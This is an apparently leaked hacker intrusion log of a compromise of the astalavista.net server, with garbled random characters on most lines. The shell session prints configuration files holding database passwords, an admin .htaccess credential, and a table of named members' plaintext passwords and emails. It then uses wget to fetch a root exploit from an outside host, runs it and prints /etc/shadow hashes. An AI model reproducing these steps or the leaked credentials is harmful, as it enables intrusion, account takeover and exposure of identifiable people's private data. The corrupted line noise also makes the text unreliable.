" E8 w( W8 y) ?- S5 a4 K% d% ndrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend2 g6 V1 v$ a5 U4 Z; } J
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner% ^- k0 h \7 e
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg4 \6 @% l! K/ C* T4 E
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config' W* y: h% c- p% p( w H/ i/ {
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
9 E. o* ^5 @+ L7 v6 \: Odrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd9 T* J7 k# P# [: @, M
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
4 b2 {/ ?0 Z$ q& ?' x-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
7 i7 C5 g; F7 d4 jdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
% F; `/ w- k9 m; G, N0 g- g4 ^- C7 ^drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour. J+ ?- Z6 a! S* o/ M7 T
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess: m( H* I& X6 w1 R- a U2 }6 t. @
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
$ t0 `: [" o: v' w6 W! | r-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
. }- E& X2 L9 f' [$ X-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
/ N# I* q3 J8 s$ ~# m-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
/ z' f4 |( e' [/ P7 N' e-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php) Y! m% I0 }9 y5 y2 n
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf% \/ _- K. u9 a
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc! G$ k& \5 m: _8 T/ M& K# l$ X% H
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
! p; q8 A; x& h! |drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
% x9 p" G: ?, U8 P- ^& k0 w& A& Kdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log( ?; q' Z& D8 b; R
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member- Z9 M6 S6 A& R9 `( O. K [
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata g- `0 w' {# L' L. E* R: a i( q
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
2 l5 l* `. s, g6 ?% Q; Q-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf2 ^' F; G$ |! K. s2 Z) Y
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
) b+ ^0 A! E [-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
/ h9 L; r y7 ?* C6 M4 `! P# Mdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
0 f+ x% R! s8 b8 q6 A* N( R9 x+ mdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
2 m) v7 h5 S8 {drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com6 t {9 @# [8 `* X% p
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes8 Z; R0 v& G+ }, J2 f! T9 R2 g
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
- A" J/ c" Z8 {; ~9 Qdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl& R) x' f, y, M
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v22 y$ |2 C1 T" h4 @4 X* @9 l
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old7 s) v7 k. G1 r; Y- r7 M
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php1 B* C* s# ^( R! o
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki, J5 U) n, n& Y
6 q5 v8 t2 m& {' u! Q
sh-3.2$ head -20 index.php% G$ Q) D3 E, r7 Z; t/ M# D
<?PHP
& _ T& `; H( D+ g2 z+ X/** p& D/ f5 v0 w* A, ]( t2 f
* Mainfile (external) for astalavistaNET v2.0
5 |& n. h( H6 U3 _*
3 K1 M* Z ?+ J* @copyright Astalavista IT Engineering GmbH8 n7 E7 i: q( ~ E& j; ]) a+ }& K
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>* A% e# \* c- g0 j1 g
* @version 1.0& ~6 Q$ s$ M4 C
*/. g" V1 L( ~# F9 m$ R
: X+ ~8 V; b, v6 t2 N) d if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {' o! P, }% _0 w/ J6 D4 I) L
$dontStartSession = false;& q# J/ s; \" n, c
} else {5 t J# N: I' f( s6 S) j* C8 K
$dontStartSession = true;
( s J7 `, f& Z; m1 s- }8 o/ K. ] }: e: |/ s- o9 l( m0 i
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
! d' i) g+ r4 L' i$ n- f. L require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
' Q+ Z! P/ U; d require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
1 ^5 L. b) u7 T require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);: Q G) v: y6 r2 l+ Q" O0 ]2 A! d! u: d- Y
0 u4 y2 x; y2 M* z$ a) ]5 k ?
sh-3.2$ cd config
' L% J8 S, M3 ~( z3 T- Hsh-3.2$ ls -la
7 a T: D9 q! C1 Q2 f7 Ytotal 32 l$ Q8 E7 z1 f- f& `
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
' ]% h+ R9 _. z& X5 m# Hdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
1 f0 ?; n2 p4 O-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
' F: q3 G2 G# y8 A-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php B$ B; p8 R/ i" v4 J
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
3 B; m0 s0 Y6 `-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
$ g# O# M* M6 R$ n9 d) S: R-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
) y& l/ I, e& d. J' F
$ b- R! E; h* @9 w; z _% [sh-3.2$ cat com.conf.php
8 m0 j. O! s* E6 U[snip]
( k* E8 C6 Q7 W l0 d% y//member-database H0 `. g9 p: E2 c" Y
$_CONFIG['db_mem_server'] = ‘localhost’;2 u5 t' P |! G2 H3 H' l% a
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;, B" y' B+ ?, @0 `& a, m4 c* K
$_CONFIG['db_mem_user'] = ‘astanet_db’;
/ a2 k5 Z# o, w& R8 v7 G& u$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;" e' Z" I2 N0 f
$_CONFIG['db_mem_debug'] = false; //true or false5 o! X/ M( C. h- J& \
//ads-database
# d5 ?* k" D: G# M* \- v) b' t$_CONFIG['db_ads_server'] = ‘localhost’;. M* [( g8 d0 q+ X& N0 n8 m1 V& D. }
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
! E0 F& u: B1 w+ Q$_CONFIG['db_ads_user'] = ‘astanet_db’;
6 D2 Q4 F) x/ B7 v% G( u/ l T8 n5 @$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
; K5 _( E; ?7 |0 z$_CONFIG['db_ads_debug'] = false; //true or false
; x8 o+ j" X; o/ r* |9 A% ?4 V( L//rainbow-database
% @9 U) E3 v7 N! f$ N" z$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;8 y" Y1 E" ?# M% h: V
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
$ [5 K6 ~. `/ l0 H$_CONFIG['db_rainbow_user'] = ‘dinu’;, F" W. T+ U q: G9 T3 \7 F" D E! Y. s
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
. L; j5 m) \$ g, n0 n$_CONFIG['db_rainbow_debug'] = false; //true or false K+ c$ b* h: P
//mailing lists database
# y6 A, T+ [$ e7 B: i$_CONFIG['db_mailing_lists_server'] = ‘localhost’;1 z L; {$ D2 q9 p& g2 A% h5 }+ C& r- ]
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;/ W' o3 }$ d# N6 ?( M
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
( ~% i$ A$ b9 |" w0 X$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’; w) v* k- F; z& @
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
# @4 p- S" ~& ~, M3 d" x+ @; p* Q* }//paypal
& J0 L, H o% k7 z$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;% |- Q5 z' q' V
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;% d: `" X/ b# R3 |
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
0 c' V6 E0 ]0 @4 G/ \1 Q$_CONFIG['sub_pp_noship'] = ‘1′;+ {3 c& q: H' f0 A# l+ c6 X
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
$ K: `% C9 X* R/ `: `6 m[snip]
7 c# M8 H+ a2 _* r5 }+ @
+ i- ^+ X$ U" x Y7 X' g4 ush-3.2$ cd ..
4 |3 E$ l+ G& h- Dsh-3.2$ cd member
% y; @/ b$ z g- g; a2 m. {sh-3.2$ ls -la ~7 ?* V7 ` }/ g* |
total 20
( K4 e! Q, l& k* @drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
( u: ^% t; f/ u; ^5 xdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
3 M3 C$ ?6 ^" Z-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess* T9 c! ~" I0 c3 o1 c B; S2 C
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php/ k6 n: M; m# e
sh-3.2$ cat .htaccess
X# i& D$ h; R$ x) ]# hSecFilterEngine off) h/ |9 _1 |- p6 D+ R# t, J1 }
; n0 m& k& ^% n7 a, Z
sh-3.2$ cd ..
3 x9 k$ e3 B/ O( K8 @6 ^sh-3.2$ cd cron
) T z+ d' P0 Y* fsh-3.2$ ls -la ?1 ]* \) q6 q
total 168+ [& @, e B* D5 ^
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .. Y9 e* P& G& p! r( ?
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
! n6 n1 m4 W2 D& c+ ?-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
2 F9 g: K8 z7 k# `-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
) ]6 k3 B. D8 h% p: e-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php& m$ Q8 p$ q0 P, v- U& C
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
8 H; W5 w8 z6 N4 k6 p-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php" a: l) Y" @3 o! ^! I$ I
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php1 [4 L: i$ O7 T4 k) u7 G- O
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
+ E* T1 \- N4 C% c. g6 x, c-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php/ w9 ?+ f+ c2 I2 E+ r- [ A. `
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
* f" h, c8 ^- r-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
1 f% G' i/ l% l1 D+ \6 k+ C; f-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php0 x! ~( ?5 q4 j, g
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
9 G6 H* `* _% S3 m& E5 D! [% ?# T2 o-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
" M9 B. S6 J+ H# u" Z& R! ~-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
3 @: Z ]! y: e-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
8 Y% f6 b" P# ^# g-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
; r" Z' a9 s! ]0 h7 v% K-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php" K5 `) J0 W8 n6 V% ^- Q
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
6 @9 U( o& y7 O: Y& n* d* v7 N# D+ ]7 edrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
# h' G _. Z! I2 h$ @-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
9 E! a3 f6 u4 D* q3 A( b, I-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php w; F8 c5 S1 `4 V6 C2 j. H
9 h( i3 [- p: o' l- X/ l4 {8 \sh-3.2$ cd ..
k& Y/ X' F6 ^) \; ~1 F1 tsh-3.2$ cd _007
1 L- q& r' d: ?* F5 [sh-3.2$ ls -la$ Q1 F( j* g: H+ Y
total 248 O2 y0 X7 q' H% p1 V
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
5 m$ X( t4 M! s* B6 ~drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 `& W: {7 ]; b* ~
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess. S& g2 N6 b; b
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
' o% H, r. T* {2 v: Q: T' Z-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
8 ]9 h% L9 R, e- j& J( {& _drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
4 Y$ x) j2 S: F- o5 |* e2 p0 l& P. o( @! G* J$ c D2 M
sh-3.2$ cat .htaccess
7 r' Y: |5 {' D' x/ ?authType Basic; P( U$ L# m9 G
authName Admin
8 q- V1 b" j# A* VauthUserFile /home/astanet/auth/.htadm_pwd/ c4 ]: @* ^: U3 F4 h% t3 K; U
require valid-user1 o* [2 u( r4 i
% e+ Y0 q( f0 Q( T. [sh-3.2$ cat /home/astanet/auth/.htadm_pwd3 [5 L& s) R6 R5 g7 v! ` T x7 X+ E8 m
admin2net:CR0bl65MwhfT) L" A8 E2 l4 q. V: A* E, L0 i! K! R! p
& ^( K% Z. G% z4 T) ]6 S% b/ O, a9 Lsh-3.2$ mysql -u astanet_db -p( w+ ?7 h( s7 H
Enter password:7 p: n1 D- ~: Z: \
Welcome to the MySQL monitor. Commands end with ; or \g.
9 w% h6 {# Z! h) D, g3 eYour MySQL connection id is 275153$ y( p. ]% f% C9 {
Server version: 5.0.45-community-log MySQL Community Edition (GPL)1 @5 C7 ]# e! N! @2 I
% j% z } A; V7 G- K
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 f2 L7 ]9 [% W: V, l7 Q
) B9 J ^6 a. {- `/ Bmysql> show databases;3 A$ U8 p& t. t0 |. F+ c2 w
+———————–+
, H4 C7 X; F# M5 B% Y| Database |
2 u$ H7 c5 T- d7 `( k% T6 ?& L+———————–+( f$ {5 z: l# \/ D
| information_schema |
" R: I3 A- P: A" z' o6 ]9 R| astanet_ads |& S7 E7 q# U; S8 Y& }" B S; j
| astanet_mailing_lists |
7 g' x4 g+ ?$ }| astanet_mediawiki |$ J" N. T3 T# `7 A
| astanet_membersystem |* b% d' N. F8 q& W2 Z3 z
| test |. P3 }& y! S9 B1 f2 J: M
+———————–+
8 L+ ^7 J% m7 ~9 B6 rows in set (0.00 sec)4 J$ H) e L7 u2 @( y
- Z2 N/ j3 V; Z/ C6 l
mysql> use astanet_membersystem" x! s* x4 G o- a/ J; }3 ~$ C
Database changed
6 A4 L, ^3 p+ H6 L5 T. s) Wmysql> show tables;8 `; G& K5 o5 q+ Y* c# [
+———————————–+5 f' ]# _8 r1 E8 v6 D
| Tables_in_astanet_membersystem |) }% b. D a- b! I/ p
+———————————–+* |; w: j- F: ~! T& m- a
| blacklist_categories |
- D0 J- q7 I' U| blacklist_content |" C: k. ?1 a$ \& J
| blacklist_levels |, j: L7 I8 e' [9 S
| blacklist_mcset |& y" {4 {5 d: d4 K5 k/ I8 P5 I
| dir_categories |
( i5 R/ H- a4 A' }8 K: W| dir_comments |4 m9 S, g8 ]6 L( P. d
| dir_links |7 U v. p0 y4 [2 p3 W
| dir_temp |
+ H$ S/ m) [& `# S: q" K| dir_votes |9 `% ` `; q1 {) j5 k4 R! T
| documents |
0 N# `* [6 b A# V| documents_categories |
/ e2 X& S. l+ s/ M3 [0 g| email_content |
" G$ P1 l; T. g4 l| email_settings |
) a2 ?! J8 S6 M- z$ o* G, G| exploits |0 V- E0 ^% d) {. _
| exploits_categories |
( {' l5 e' w/ t9 ~| exploittree_categories |
4 `5 n* n2 @1 Z0 c# A| exploittree_exploits |1 f& X6 i8 k& a( k$ A5 K
| home_values |$ }) v! B; q" T2 g7 [# O+ P
| iso_countries |; I# M/ B2 n* [$ L/ R7 [, _
| links_categories |
7 `& l0 o% r0 Q* h& Q1 J9 D| links_records |
# E8 r$ X1 R; s7 u( || links_unauth |
: K( C! k7 j6 r8 g, `9 A| links_votes |
+ O+ F4 H' q5 H: i* O| log |
) _5 j" F- L0 `% F! P" y| news_categories |
+ ~: w3 P! V' t% ^: S& J| news_comments |% o& w) K1 Z8 x4 D8 L, J& k/ p4 t
| news_emoticons |
5 f" {; ?2 Y1 \# ]6 W, C| news_latest |- W# D. S; o4 q. w# ?, C
| news_messages |- ~$ ]9 C( ~% J7 {3 n7 x! c- [7 B
| news_statistics |
" f( ~( A6 `; N. n$ Z v| news_votes |3 E% l0 n. w$ N
| prices_content |0 K/ N+ A! o7 W7 z9 S
| prices_offers |
& I3 X) t, O0 X| rss_settings |+ |9 | ?0 e7 y4 A# M% q
| sessions |/ p; q' _( H5 F$ \) ^2 n1 `
| stats_signups |
, e, z j. [6 o& ~! R# J) j| u2u2 |0 }7 _* f M: \! y' Z8 t0 V( I
| u2u_contact |
, {; {( c; Y M j% T( g| u2u_settings |
1 h" Q1 b B. I* l| user_keywords_selected_categories |5 ]0 D! R/ ~# z8 s5 H# t. X* |1 ^
| users |7 l6 `8 {4 m0 j$ Z+ M+ A& l
| users_ipn_test |
: S* E( J' m4 ]$ ^7 {| users_keyword_values |
% Y& K- ~( s0 c| users_profile |
1 u0 {" o l$ d! ^| users_temp |5 N5 J) z% l) o9 @+ S
| users_upgrade |
! c$ n1 m5 f% ^ j. X+———————————–+2 |4 {: q/ W$ p9 _/ @ l0 Z a# A
46 rows in set (0.00 sec)( o) k' y) j! @ J# I: u7 G
( [/ Z5 z& ~8 w- ~# w* Gmysql> describe users;6 A# ~/ b; a3 @0 J2 g( B
+————————–+————————————–+——+—–+———————+—————-+
- z; f, a5 q/ o, Z8 W% A$ B| Field | Type | Null | Key | Default | Extra |& I6 U4 I9 i( b p* D9 `9 k
+————————–+————————————–+——+—–+———————+—————-+% N. ?" w! x! s* C" ~
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |" v" p* O) l8 E) }
| user | varchar(50) | NO | | | |
+ k! ?+ s& ~0 o% ]* G| nickname | varchar(30) | NO | MUL | anonymous | |
z r* S/ ^, l+ U3 F) `| password | varchar(30) | NO | | | |# N3 o( c: S8 E- H) |! q
| userlevel | tinyint(3) | YES | MUL | NULL | |* b; f- w3 O6 t; l9 p4 z; L
| exp | int(8) unsigned | NO | | 0 | |
) c6 E$ y7 n6 G8 A+ m| email | varchar(50) | NO | | | |
( O. e$ ?" n6 I# T| ip | varchar(15) | NO | | 0 | |& _1 K9 N; ~8 x
| proxy | set(’0′,’1′) | NO | | 0 | |
0 o& B2 d# c& w" }$ {6 Z, I| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
$ Q, x+ }( ?" c5 z' j; \8 O| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |" t- x8 L$ B2 I& J5 m
| anz_in | tinyint(1) | NO | | -1 | |9 F! v& _! C* z) M5 _
| status | tinyint(1) unsigned | NO | | 0 | |6 s2 [* N; Q+ _3 i, \
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
/ o' r" u) G5 j" G$ }/ n| freemember | set(’0′,’1′) | NO | | 0 | |' a/ \* Z, w$ |. e1 Y: I3 g
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
# Q& l6 y Q# H, O| lang | tinytext | NO | | | |
+ W& | I) d" N' r! f. m$ ~| adid | smallint(6) | NO | | 0 | |
6 ^+ P5 H {% P- I& {3 Y9 X3 u8 ?| pp_txn_id | varchar(255) | YES | | NULL | |
1 f& y0 V+ A7 S0 t, T e' \, E| cnb_transaction_id | varchar(255) | YES | | NULL | |8 G5 H5 e4 L; a) w! I
| cnb_order_id | varchar(255) | YES | | NULL | |
/ y7 E2 I6 b$ I0 h+ S$ v- t| cnb_user_id | int(11) | YES | | 0 | |8 [- I+ U1 F' I1 ~/ q) ~5 v
+————————–+————————————–+——+—–+———————+—————-+
# Y6 G4 f& N$ m) v22 rows in set (0.01 sec)3 o6 l( D. n2 y( ]" [
2 V( G7 V7 ]! v$ B( {- y
mysql> select count(*) as skids from users;
- O( G' v9 _ j! g+——-+
8 K0 w# d8 y3 [. h X0 y| skids |/ [9 D4 N/ v6 @. _( X
+——-+
: _; I r9 x! d+ N5 L0 u| 25199 |" O6 p+ E" a8 L1 I, e$ f9 s
+——-+1 N$ @" M7 D! U+ F( W7 q, Q2 c
1 row in set (0.00 sec)
+ p. c4 V. Y+ r- `& H d- @! a8 n+ C/ B+ o# Q% Q) O$ {
mysql> select user,nickname,password,email from users where userlevel = 1;
6 I$ l7 b- y4 ^3 Y1 |' v+————————–+———————-+——————+———————————–+) I0 R, e R4 s/ k
| user | nickname | password | email |
2 E- J( p7 Z) Q0 E; r0 k+————————–+———————-+——————+———————————–+' N) Q7 N3 T2 V" v* d% \( V
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |' D% E! {6 C! ^
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
, D- N: X6 C* N| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
& \# {! m2 U# F* h% C| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
0 L$ ?. Z, C& l3 P6 H* x| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |1 x2 d+ a4 C C8 `6 y
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
( ^0 N- V+ @2 }# j3 G$ r; v| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |6 P, a" G. n9 d5 @, G$ }: |5 w; W+ ^
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |$ | ` h% |* K' w) u) d
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
3 x/ {7 v1 t& l+ _8 r| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |5 Q0 G1 m- K! [7 }8 i8 C! D( y' @
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
! H; p+ D+ W& ?7 R1 B Y$ c| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
" p! o. P' i# V0 x| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
3 \3 Q$ n& c3 k8 S! `' J. W| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |, F7 r/ T2 S. i6 K; d
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
5 i& T, D' H! v5 g| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
+ W) L+ U- ^9 D8 q2 k" {| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
; x* H( a* N& P4 i ]6 t, Y5 y* m| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
- {# }, }3 z! R/ L1 A3 b' B' K3 b| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |, {( ~8 n+ X [2 S4 }
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
8 K0 y- _- R& h4 Y' h+ ^| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |' u j+ G! {, V g* i3 ?% ?
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |% ^+ U) ]2 C G% a) o( b: E7 e, r
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |) w M$ y* G6 [4 H6 {
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
* C3 P. l1 N' y% Y3 Y% u# C| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
5 k5 P7 }1 Z- m7 l, X, x7 L& z0 F| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
! e; _9 J$ F" ?/ p! `. J' r| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
- a. Q$ Y( j4 c8 }5 c6 M! b N+————————–+———————-+——————+———————————–+
+ q+ l0 c: p5 J27 rows in set (0.00 sec)
4 |4 p' }* S% x
. v% g* v/ W! l& M2 b) t8 G; Smysql> exit;2 c1 c( D/ d; o" x( U7 Y: W2 Z
Bye" h; o1 r2 `; w' T
$ N0 L) j. M2 D) U# s[~] plaintext passwords? yes,0 w1 m- I/ K: Z8 Y* M- G
Those so called “security professionals” who charge you $6.66 / month to
i- c$ W5 h# j3 Y) ~% `& Xregister at their hack-proof portal, save your passwords in plaintext…
1 B* Z! Q+ B$ i3 ~; j2 n7 gbrilliant!! {' @; ]3 r _( v, C7 \
' s3 Q, y# G) ~( Q1 i* F[~] This been fun but we want more.8 | e2 x2 b5 L5 n
- v) y: L) a1 l2 y S0 Z
sh-3.2$ uname -a
5 t; y* r8 k" r+ ?# `9 VLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux, p- e2 h% J W
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
% P* n+ G, s! l4 ]0 c& O' I–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
& f& }0 T! Q3 O s" g% _Resolving anti.sec.labs… 13.33.33.37
% [" _ q6 d8 ?1 {' s7 uConnecting to anti.sec.labs|13.33.33.37|:80… connected.7 T. _' B# c+ N% N
HTTP request sent, awaiting response… 200 OK
# o7 G3 J1 |& b2 ?0 [2 a: L% _Length: 18200 (18K) [text/plain]
* V1 A* L6 M( Z; b5 m7 h g6 \: cSaving to: `g0troot’6 A. E! ^2 a" c* k1 I* m4 {7 ~( P
# x6 J5 J9 f/ B* a" i100%[=========================================================================================================================================>] 18,200 58.6K/s in
5 ?0 j: G- `7 q5 P1 l! t0.3s
+ \% ]7 v9 X2 r; O, N0 i6 ]# V3 D8 q; @$ D
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
1 \3 } U6 ~( ?) t6 d' g* W* z( G7 f( T* Y3 X) F
sh-3.2$ ./g0troot -i x86_64; ^( W5 E$ Z8 p$ r K
[+] g0troot - anti.sec.labs5 C. f# ^( H3 B$ d
[+] Target: 2.6.18-128.1.10.el5
7 Q, f( p$ F( V8 Z8 f8 `# u[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
! B5 J- q1 X6 b7 \: ]* ^ O* Q3 l2 O% Z' C K0 }: @
[+] r00tr00t. V4 _2 J* D5 I/ `
[~] Executing shell…# l: d ]7 Q/ D# N
+ v0 c# j. b1 k4 K4 [ }sh-3.2# id8 ^: D+ v- i% B, G6 y
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel). {8 ~; c& A: o3 m' H3 `
. T% A1 O) G9 d* Z9 J6 xsh-3.2# cat /etc/shadow" |9 S% R4 l, g
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
. I$ [9 r3 J9 E; z" c[snip]
/ x, U4 I6 z; z1 Radmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::5 M7 X+ Z7 E! n* m5 ~6 g
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::3 \$ ^0 l2 w9 k5 N" f. [/ T
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
5 B* K* w4 {& l2 t- V9 C, T- p8 _astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::, ] \! ^. U& J* X$ \
+ R5 H! o) u. }& |! e- G
sh-3.2# cat /etc/motd
" x* p& `6 q9 O8 E$ e1 B#####################################################
+ E4 N$ n5 q! p# k7 s K7 }#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
